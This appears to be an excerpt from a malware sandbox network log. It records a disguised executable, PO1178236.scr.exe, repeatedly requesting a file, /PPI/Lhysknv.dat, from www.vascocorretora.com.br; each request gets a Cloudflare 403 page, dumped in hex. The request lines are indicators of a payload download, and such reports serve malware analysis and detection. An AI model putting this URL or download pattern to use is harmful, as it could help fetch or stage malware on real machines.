        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:11 UTC1369INData Raw: 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74
        Data Ascii: loudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="widt
        2025-01-09 07:37:11 UTC1369INData Raw: 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f
        Data Ascii: tion cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /
        2025-01-09 07:37:11 UTC1369INData Raw: 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 62 39 36 62 63 65 31 38 62 63 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69
        Data Ascii: text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c2b96bce18bc</strong></span> <span class="cf-footer-separator sm:hi
        2025-01-09 07:37:11 UTC1004INData Raw: 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 62 39 36 62 63 65 31 38 62 63 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 7a 4d 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c2b96bce18bc',t:'MTczNjQwODIzMS4wMDAwMDA='}
        2025-01-09 07:37:11 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        123192.168.2.949832188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:12 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:12 UTC1009INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:12 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:27 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F3fZ%2FbwzjFHf%2BkMeTsEFhWONW0w9FOQ616jYF%2B96dJS5CBvYTGUByjGVeLDSJlkpyOjKGtr8PKR2OecHwOtmSRFkMlVZzs0sDgx7cRaXUdD80bwC%2BsHBWjID0aekZ%2BZJ1P2J5BL0VCLWpkRL"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c2bd3cf743b8-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1683&min_rtt=1656&rtt_var=640&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1763285&cwnd=231&unsent_bytes=0&cid=628ea6da6ee3b162&ts=145&x=0"
        2025-01-09 07:37:12 UTC360INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:12 UTC1369INData Raw: 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d
        Data Ascii: udflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=
        2025-01-09 07:37:12 UTC1369INData Raw: 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63
        Data Ascii: on cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.c
        2025-01-09 07:37:12 UTC1369INData Raw: 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 62 64 33 63 66 37 34 33 62 38 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64
        Data Ascii: xt-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c2bd3cf743b8</strong></span> <span class="cf-footer-separator sm:hidd
        2025-01-09 07:37:12 UTC1002INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 62 64 33 63 66 37 34 33 62 38 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 7a 4d 69 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c2bd3cf743b8',t:'MTczNjQwODIzMi4wMDAwMDA='};v
        2025-01-09 07:37:12 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        124192.168.2.949833188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:13 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:13 UTC1011INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:13 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:28 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oh5GQsr8Xw12ZrNSWKIT5wAXNFL6cQj%2F9zf9Ncqfn%2ByA6i3U%2BY8TkYUzo3OTs4yTlp3psa6zzpDMcODDgc%2Buf9KVgZ5n5NjYTU1gLtqn7Hm8Wa88KERWOJJ5MgJJ7J%2F2FHu%2FTtwcg2RcIbNN"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c2c0e9fe7c93-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1921&min_rtt=1918&rtt_var=726&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1499743&cwnd=210&unsent_bytes=0&cid=75608cbe750a601b&ts=147&x=0"
        2025-01-09 07:37:13 UTC358INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:13 UTC1369INData Raw: 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74
        Data Ascii: loudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="widt
        2025-01-09 07:37:13 UTC1369INData Raw: 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f
        Data Ascii: tion cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /
        2025-01-09 07:37:13 UTC1369INData Raw: 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 63 30 65 39 66 65 37 63 39 33 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69
        Data Ascii: text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c2c0e9fe7c93</strong></span> <span class="cf-footer-separator sm:hi
        2025-01-09 07:37:13 UTC1004INData Raw: 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 63 30 65 39 66 65 37 63 39 33 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 7a 4d 79 34 77 4d 44 41 77 4d 44 41 3d 27 7d
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c2c0e9fe7c93',t:'MTczNjQwODIzMy4wMDAwMDA='}
        2025-01-09 07:37:13 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        125192.168.2.949834188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:13 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:13 UTC1013INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:13 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:28 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m69qh7m79PPJhMbk%2FvZEoudUOkSANzruOzhO811NN3%2BQxazqj5iEHkk1kVgCLuh82DWDauCj4xCB7C8OxaAY%2B94jisNXge%2BG%2FNOQ9Pi2e75PDf5rSYTUlTK4LKgRFvXYpI%2FwrG5aMyzCKD%2Fa"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c2c4bbb23314-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1985&min_rtt=1978&rtt_var=756&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1432777&cwnd=212&unsent_bytes=0&cid=bcf7a3889a70a72e&ts=133&x=0"
        2025-01-09 07:37:13 UTC356INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:13 UTC1369INData Raw: 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
        Data Ascii: Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="wi
